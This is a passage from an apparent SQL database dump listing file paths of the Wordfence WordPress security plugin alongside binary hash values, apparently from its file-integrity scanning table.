$8','',0,'?'),('=w,M','wp-content/plugins/wordfence/css/jquery-ui-timepicker-addon.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')ef#`P~7n','-mznNFE\0ѭ\\vqsL?Z\Z','',0,'?'),('éY#Q6ǒ','wp-content/plugins/wordfence/css/jquery-ui.min.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}O^0tGGQ','ٍ$rb=phxK5]8QRjn4','',0,'?'),('V/j6*','wp-content/plugins/wordfence/css/jquery-ui.structure.min.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#/h<U','ni뗅NvX7Y]D','',0,'?'),('<\0\0X.gN','wp-content/plugins/wordfence/css/jquery-ui.theme.min.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bK0bxљ]','4\ncE2=V{+\\goЅO','',0,'?'),('P\rL9?E','wp-content/plugins/wordfence/css/main.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';诘SoȢ-','\n2V\'Kf94Qr: 2','',0,'?'),('U9-rR','wp-content/plugins/wordfence/css/phpinfo.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>Q!0w/蓴','a@|I\r=\Z^εd)[W','',0,'?'),('y\0qB{w','wp-content/plugins/wordfence/css/wf-adminbar.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0\"CϷTb','hS䘷*g5)!}BlNE','',0,'?'),('8wq`\n;wZ','wp-content/plugins/wordfence/css/wf-colorbox.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PX)p!N8j','ot0\rP2NiKu','',0,'?'),('YLWp?b','wp-content/plugins/wordfence/css/wf-font-awesome.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'MًV:','997dIOu-%enԻ1I','',0,'?'),('HkZC\"','wp-content/plugins/wordfence/css/wf-global.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p]$ڡ\n','淇tj?\"E\0$Ӝ Nhq3{','',0,'?'),('\\*UGXAS','wp-content/plugins/wordfence/css/wf-ionicons.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Alsj⯃','ג4ˮvM`VZ','',0,'?'),('h&i\Z','wp-content/plugins/wordfence/css/wf-onboarding.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/KwtG\'(','mǸ${&W>.{?Wo)=H','',0,'?'),('DCFIYZ$h','wp-content/plugins/wordfence/css/wf-roboto-font.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']Ouݵ','+hJ~ʆ*a*Gb67\r:','',0,'?'),('xGh','wp-content/plugins/wordfence/css/wfselect2.min.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c3,BV','ڑt4U\";t7\ZJyrb@','',0,'?'),('ţG+G','wp-content/plugins/wordfence/css/wordfenceBox.1592338782.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CWY~H#]','r{\ZI5O1QӇC','',0,'?'),('͎3עJynĀM','wp-content/plugins/wordfence/fonts/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nq*ZF)2','&4\"\rQjXmN\"?Po\\?','',0,'?'),('2\Z {DZ-','wp-content/plugins/wordfence/fonts/ionicons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hI15[I]J','*\\&t䭨\\	gTw,1','',0,'?'),('ZQ!*','wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xGIzQXKMnyrYk.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`y\0#xsGJt','Arx?j#CFOG-S$','',0,'?'),('jtZܿ,','wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xIIzQXKMny.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','raai','{JLͻ&{{T:B','',0,'?'),('>uʸ!4N2','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fBBc-AMP6lQ.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',;L\'dee','+GT}m)*[c5ZN-v>','',0,'?'),('m{@m','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fChc-AMP6lbBP.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oLFʒ4i--','Cc#1_|Z  1ɾYx','',0,'?'),('ӕ\nt0','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fBBc-AMP6lQ.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mpGaBNX>(','%-*Ψ6Fi\rWϹM׽WI:vD','',0,'?'),('и+:3XnNtexX','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fChc-AMP6lbBP.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{W7h>','	2mw3)zWgv{AfHu`Co','',0,'?'),('G:Z]Y!tI\"','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfBBc-AMP6lQ.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jI78{rP','UkZM=OEwDw |I;','',0,'?'),(']K{ٯ`{,','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfChc-AMP6lbBP.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+EYH<YPK=S','ۋ&:^G&B2PC~','',0,'?'),('pwQFcߠb*','wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu4mxMKTU1Kg.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@$qG2k5$z','ֆF*`\'O triR:j0W\Z=j','',0,'?'),('U]R)Ym','wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu7GxMKTU1Kvnz.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nj09','\ZҨ2#s:Р\n		vØ+l','',0,'?'),('4;`߯z?	{Ǟ@','wp-content/plugins/wordfence/images/2fa-whole.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h»$\ZPfX','ƪɝU[Z~^d\'Xٮ','',0,'?'),('26,̞|keL\ns','wp-content/plugins/wordfence/images/2fa1.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/)h\\ hG8','C%0z)f @t>ɶ{T8o','',0,'?'),('J=R\'t^}\n','wp-content/plugins/wordfence/images/2fa2.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0H','npʅG06KqJ]J','',0,'?'),('様7^b\"','wp-content/plugins/wordfence/images/back_disabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hgi>','䏛N7g΋?Fb!}ݿC鳇','',0,'?'),('׮Fps4','wp-content/plugins/wordfence/images/back_enabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']H','9퇥)R$px#q {#LO','',0,'?'),('n\n\0܁-i','wp-content/plugins/wordfence/images/blocking.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'-Hf<1','A5Y9\0OtqЖL\\}a&','',0,'?'),('^yG=ڜFg;3á','wp-content/plugins/wordfence/images/button-grad-grey.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RCTy?','DH~ϨP_{!','',0,'?'),('N7A\0nnV֑','wp-content/plugins/wordfence/images/checkbox.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"G\r6|􈘀\'','y~`w(j~=뤼&ݴQ>`^x','',0,'?'),('oYڅX','wp-content/plugins/wordfence/images/flags.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W7 (˿!\Z7','Bx0%Ly6!X\\z/<n6=\ZW','',0,'?'),('.E[Jlx','wp-content/plugins/wordfence/images/forward_disabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M_Z?N)Ҋ:5','/<>O&ȕJR݇e}(m','',0,'?'),('\0hKf\0','wp-content/plugins/wordfence/images/forward_enabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U\0/3e4e','0Q7018ު9-z9ؽqSrĒP','',0,'?'),('窒u\rZJW+','wp-content/plugins/wordfence/images/help.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$N;\'M Y','\Z7\0r/iz;ki,=LZg','',0,'?'),('٘\"Pܞ,','wp-content/plugins/wordfence/images/icons/ajax24.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:m𙗣P','j*edoX~7&N9|L','',0,'?'),('\' oS','wp-content/plugins/wordfence/images/icons/ajax3.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mwߴtꍓ\'\ns','dz\nyKƮ\'#]x	VJR.=:','',0,'?'),('y&aA7]Dm','wp-content/plugins/wordfence/images/icons/ajaxRed16.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%B\ng2;','D,AJlOSpe؇&','',0,'?'),('4=','wp-content/plugins/wordfence/images/icons/ajaxScan.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʖѴ~fi','ߩ0ԍѦƻH\n¡;','',0,'?'),('j&V164','wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r9 #{','ﾱnѿ0c~NrAug~ΔI','',0,'?'),('(x*J,LÛn<K','wp-content/plugins/wordfence/images/icons/arrow_refresh.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kw``|}$G','u/2/@H_Ilh/aU:	','',0,'?'),('6[f9? _','wp-content/plugins/wordfence/images/icons/bullet_yellow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J&ɌԔQ<','1Nߗ׍?*ií!FMp9^.','',0,'?'),(']*J','wp-content/plugins/wordfence/images/icons/email_go.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jEH).','& qC1QU_.O31!&۴','',0,'?'),('`%{+','wp-content/plugins/wordfence/images/icons/error128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':%7!.','{h\0,]zkV{җ6nG\nxs9','',0,'?'),('z5*\ZADZCkj','wp-content/plugins/wordfence/images/icons/magnifier.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uO{:qcV\'',' atvdQ0(IjƖO$e(*','',0,'?'),('Ρ~ߓ:eo','wp-content/plugins/wordfence/images/icons/tick128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ğch4\"','V}X e~G[C峆5','',0,'?'),(';`$r$=','wp-content/plugins/wordfence/images/icons/warning128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pGIt*Np=','*/ȾstA}.b\'\\','',0,'?'),('u64E~:','wp-content/plugins/wordfence/images/icons/working-indicator.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VF{N	\'G','fXRZ|:Ob=f[y5 ~	','',0,'?'),('X@%1Ci','wp-content/plugins/wordfence/images/lightbox-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m]a\\$','Ǘh?S):i@h.Xg','',0,'?'),('?z6aDz','wp-content/plugins/wordfence/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:m𙗣P','j*edoX~7&N9|L','',0,'?'),('Kjh','wp-content/plugins/wordfence/images/loading_background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'2p\nKX','Ύ%XŖF1s;Lzr璻','',0,'?'),('ﾘQ)B\n,','wp-content/plugins/wordfence/images/loading_large.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y{ObUW~Y˙','p8\'	t:Qo]{5G1E','',0,'?'),('s♼{DR[k1I','wp-content/plugins/wordfence/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zFހW\rl~6','V{Q9V	J	Xqڀc','',0,'?'),('z^}¤hh3\rw','wp-content/plugins/wordfence/images/options.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VѴA','D:bw#^4BKIP?	znV_','',0,'?'),('xD.m~<2','wp-content/plugins/wordfence/images/ratelimiting.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0[MɞyP','@Sy\'N+kB3J!PbƖ','',0,'?'),('QoH*(','wp-content/plugins/wordfence/images/sort_asc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',I+ƾ=','dCTe&,)ѴFG\ZdON','',0,'?'),('57N	C=-c','wp-content/plugins/wordfence/images/sort_asc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&DKzS§0','NQ*TZ%P%jܑtZn/','',0,'?'),('lXwB*XW','wp-content/plugins/wordfence/images/sort_asc_disabled.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oɧ*X9e','v\Z|5.YX Z鹁Ź','',0,'?'),('x_,[5','wp-content/plugins/wordfence/images/sort_asc_disabled.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ǐ#a]2','[8lYckl	u#KVn','',0,'?'),('?Yvq_ۮXO','wp-content/plugins/wordfence/images/sort_both.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%BQxSV.D','6\"@Xg\'W7wgJq','',0,'?'),('	7f	`','wp-content/plugins/wordfence/images/sort_both.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dm	8f|Y','~%ۉ%>BlouI)ȉ7g','',0,'?'),('7c.$P!\"򹚆','wp-content/plugins/wordfence/images/sort_desc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<j_ˊR2','*-9.HGO6/L):Cdz','',0,'?'),('ZD:-h${ma','wp-content/plugins/wordfence/images/sort_desc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?զ)X?N','bEԚB#:(#=_(\Z|U#','',0,'?'),('xy!q).ˉ\"','wp-content/plugins/wordfence/images/sort_desc_disabled.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m͟r 9',';	_Yt7KsmC\ro','',0,'?'),('usT­BB','wp-content/plugins/wordfence/images/sort_desc_disabled.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J%{OZ\"/o','^*n^\0m+!NkɌ/ԯ^k','',0,'?'),('o\'RD-\0o','wp-content/plugins/wordfence/images/support.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Cl$rn<.','$MԮ&(ᩘs^	Ϣ*N','',0,'?'),('PC<	vnR8','wp-content/plugins/wordfence/images/tools.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@cI','Y=RB)	~ܖݟr','',0,'?'),('O+[IBmm\'','wp-content/plugins/wordfence/images/wf-central-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q(VѤ','\0{\rߘJ/ ^+,S','',0,'?'),('@:<o|J-e','wp-content/plugins/wordfence/images/wf-error-badge.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EQts	Mzy','殙F`a݀kmEQ+~','',0,'?'),('#-g\\L%3S݋B#\r','wp-content/plugins/wordfence/images/wf-horizontal.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E%Zlo9͒','0	6ӭIvhJ`','',0,'?'),('FVOd%|u','wp-content/plugins/wordfence/images/wordfence-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p]j-','8#̄(8O\"	+h\"Fb','',0,'?'),('E(zRA1;eNqD3','wp-content/plugins/wordfence/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2eª\\og',' oMJ#A|ߎ(;6R\n','',0,'?'),('2IÜ]T1','wp-content/plugins/wordfence/js/Chart.bundle.min.1592338782.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5]ddf','>`NN`N\"KӞckG<;','',0,'?'),('k12(','wp-content/plugins/wordfence/js/admin.1592338782.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g<Z uq','x[c\0=/jv[','',0,'?'),('ќ1Y1^P|','wp-content/plugins/wordfence/js/admin.ajaxWatcher.1592338782.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CCW\Z^beD','	CJhF$Dq|,7EH;N','',0,'?'),('zI۟슞\'5[','wp-content/plugins/wordfence/js/admin.liveTraffic.1592338782.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/[n1uu}',')䓣Ad98PV+H25J','',0,'?'),('zUΔ|64y','wp-content/plugins/wordfence/js/date.1592338782.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jPER_c','B=0dƩ\"BtUc^1>q&','',0,'?'),('(_)m','wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1592338782.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','89\"zzVv*]','ۆ%%l:Jf<bqPPt˯}ߝ\"f','',0,'?'),('4<Dp','wp-content/plugins/wordfence/js/jquery.colorbox-min.1592338782.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y5=q)','H4\\v/XGK:gkl','',0,'?'),('aܲ`ĢPy','wp-content/plugins/wordfence/js/jquery.colorbox.1592338782.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(O0%69e3j','{L#\r]\ngL8P,@Ir,{ ','',0,'?'),('x\ZcJ\ZZΌJj','wp-content/plugins/wordfence/js/jquery.dataTables.min.1592338782.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<\\ ͕h','vAo;uD3$WB95_\" ','',0,'?'),('01WGN4_1','wp-content/plugins/wordfence/js/jquery.qrcode.min.1592338782.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ԹXp`me<','wP\0pzuYDSz(WߥP3$S','',0,'?'),('\Z\ZF\'I.#C','wp-content/plugins/wordfence/js/jquery.tmpl.min.1592338782.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\}\"7ڷDZ','.IH\Zg\0H!7`gޠZzȄž6|','',0,'?'),('ȗU]?dI','wp-content/plugins/wordfence/js/jquery.tools.min.1592338782.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':-Eՠx$B',',4~aTlS fQO	fTӵ;)','',0,'?'),('%șbIy,H2','wp-content/plugins/wordfence/js/knockout-3.3.0.1592338782.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_B8lc^','5J9hALg@`uwo3\0I>','',0,'?'),('`ڟ,Q(','wp-content/plugins/wordfence/js/wfdashboard.1592338782.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ԽP`{i','=Pzr!?w\Z/d!LӪ1!','',0,'?'),('mkI&n0','wp-content/plugins/wordfence/js/wfdropdown.1592338782.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rpc\'\Z','SGs8;Z!זJu1z?','',0,'?'),('k9[ix','wp-content/plugins/wordfence/js/wfglobal.1592338782.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7欑iW5ulR','$hd^Sƨ5Y٭a$','',0,'?'),('qBd hTn','wp-content/plugins/wordfence/js/wfpopover.1592338782.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';&mAhlMPZX','_.V袏X4Ni_k=C3','',0,'?'),('ebdĆL?ş$U؋','wp-content/plugins/wordfence/js/wfselect2.min.1592338782.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J!.i','lk}[ZjA.!=+5+~q 1','',0,'?'),('R1?YVDt','wp-content/plugins/wordfence/lib/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E\"xK{8dS','C\'r9@Kކtw#@k','',0,'?'),('\'FEAvQMv','wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>\r5]xVI\'i','G݅\'!YE3P5adM','',0,'?'),('y1-/fIנ','wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','09\rɘadP','F*OОq^lgz,I?bR]KֳE','',0,'?'),('-n$.#g%}','wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' OّCHؖs ','pXuc{-K׏ژ/OnE0)JB','',0,'?'),('`c0\\3','wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O\"%éODZj','Z?=b\0D\ZZ\'˿_pwѻ,:','',0,'?'),('ۖJBwC|Mv','wp-content/plugins/wordfence/lib/Diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5VzY]#yRJݮ','YM\"z)tϖ*cwL\01w$d','',0,'?'),('Ը%\ZDyZ','wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','㷏Ӽ\r*\\\"5','p.翗2M,\'[C-͠G','',0,'?'),('J![W6ݧ','wp-content/plugins/wordfence/lib/IPTraf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WJmLIg!','0b@i[%g<F','',0,'?'),('^2^T:mJ:','wp-content/plugins/wordfence/lib/IPTrafList.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n)e7e','\'|\0!t|ux^&5l','',0,'?'),('au\"9s?H','wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%1sËG','EWٳ?4@U?0bP+h','',0,'?'),('Kߺb','wp-content/plugins/wordfence/lib/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>zxC}','Nܓ#dtB!\"M՞==@o','',0,'?'),('SP;^ƭzI','wp-content/plugins/wordfence/lib/conntest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q\rƉ(.Aˬ','J&grb+\'Id	1HLWreO','',0,'?'),('fNdL','wp-content/plugins/wordfence/lib/cronview.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e(t@nr','Z4,hz=>M}G/[0l\"iK','',0,'?'),('\Z;5(OOR','wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȎcP\"','זD䟹45JbOɝHR@','',0,'?'),('zvo:B%','wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݻ1(wmF','B6;M8\Z&','',0,'?'),('\rҗr׾ \n\Z','wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!Pyt8턺P6q','kwQ)\'J~MEsrXY_Gf!','',0,'?'),('$o1T2]l','wp-content/plugins/wordfence/lib/dashboard/widget_countries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rmnZB ','݃EZ?wȖ͖s!7cJ70','',0,'?'),('Ws{NhPr㼱','wp-content/plugins/wordfence/lib/dashboard/widget_ips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZcQ\nbd7,Ze','ZL)1-|Y(|@.N_ϋu','',0,'?'),('e؟v笪Ej','wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/]L/Gb;','$y\r\npu ?A8KΙTcVa','',0,'?'),('L.\nw;[','wp-content/plugins/wordfence/lib/dashboard/widget_logins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g#@Xs','ĪN29WDWO0ѽmGN','',0,'?'),('u;Ȍ0qw=','wp-content/plugins/wordfence/lib/dashboard/widget_networkattacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ԶwK>~\rg','#Nu}WL!\\Z 8\0;k{','',0,'?'),('k6*H	u١','wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5$g؟_ ','53=xLܑm?Z97P.','',0,'?'),('\\^s,z(','wp-content/plugins/wordfence/lib/dashboard/widget_tdf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2\'p[UaH','?}mwDqn2R\\','',0,'?'),('6Ri*5æ','wp-content/plugins/wordfence/lib/dbview.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƍݵ1苙nzk','DOhB;4U7o/g8i+̷','',0,'?'),(')\0e_5=','wp-content/plugins/wordfence/lib/diffResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0wJn','_^>8L\\{P','',0,'?'),('#\n/PZ~h','wp-content/plugins/wordfence/lib/email_genericAlert.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L)&낆(','j{bXN#R5[׍m','',0,'?'),('Fe	57[','wp-content/plugins/wordfence/lib/email_newIssues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`=dHgO5','Qi$?K^%9$O@0eƼR;x ;n`','',0,'?'),('^u}G','wp-content/plugins/wordfence/lib/email_unlockRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{<2m','RpM>d*','',0,'?'),('e\0hLщ','wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#}_*mD×cvW','m$G+59TEx7B{/,u7','',0,'?'),('*Q.	-c%D','wp-content/plugins/wordfence/lib/flags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ic磭c-','8YCO0j{\ZxDĖxO','',0,'?'),('$-#q`l$Wۉ','wp-content/plugins/wordfence/lib/live_activity.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2>(]/@ꏞf','QըW`~N_wID$J3','',0,'?'),('dTofҷbS','wp-content/plugins/wordfence/lib/menu_dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r͝ݭ5','oc@e ᤶg\ZVj','',0,'?'),('ޒ?IΩi%gy','wp-content/plugins/wordfence/lib/menu_dashboard_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j~i\'Z?','=x=)ZuY\"FF2]','',0,'?'),('WP旃^qy','wp-content/plugins/wordfence/lib/menu_firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m2_MjV','\"!bXȉr3Oe{0','',0,'?'),('3dyjV','wp-content/plugins/wordfence/lib/menu_firewall_blocking.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[? ?','b}STbcvʄ/{','',0,'?'),('Ͷjʃఱ-','wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h;BD:','\Z@\\ɔ\rqB,CKτw.z','',0,'?'),('6cbkki3@H','wp-content/plugins/wordfence/lib/menu_firewall_waf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e(# ({秡<(s','%=oVBkC%Ir(?ceC','',0,'?'),('0dۦZP2o','wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ua~v','/[+!)fhfĳXF8/H7','',0,'?'),('WM{h(','wp-content/plugins/wordfence/lib/menu_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bSMLan','hfX^Ԝ n','',0,'?'),('z8 L{q','wp-content/plugins/wordfence/lib/menu_scanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݻyz|','-uݼ>̺n~ut&)F&;qfJkSO','',0,'?'),('I|K9({sX','wp-content/plugins/wordfence/lib/menu_scanner_credentials.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ff:&,[','B&$q>P\nϾz&G<6Ǵ:','',0,'?'),('OHI!K!0[','wp-content/plugins/wordfence/lib/menu_scanner_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','; 9\0b!Q','@&O\ZqR_w)RǐlL`wүi,','',0,'?'),('-jާ ~hyb','wp-content/plugins/wordfence/lib/menu_support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yy0\'Ofx2;D','.F!x,p	[\'E\Z̻,','',0,'?'),('ojy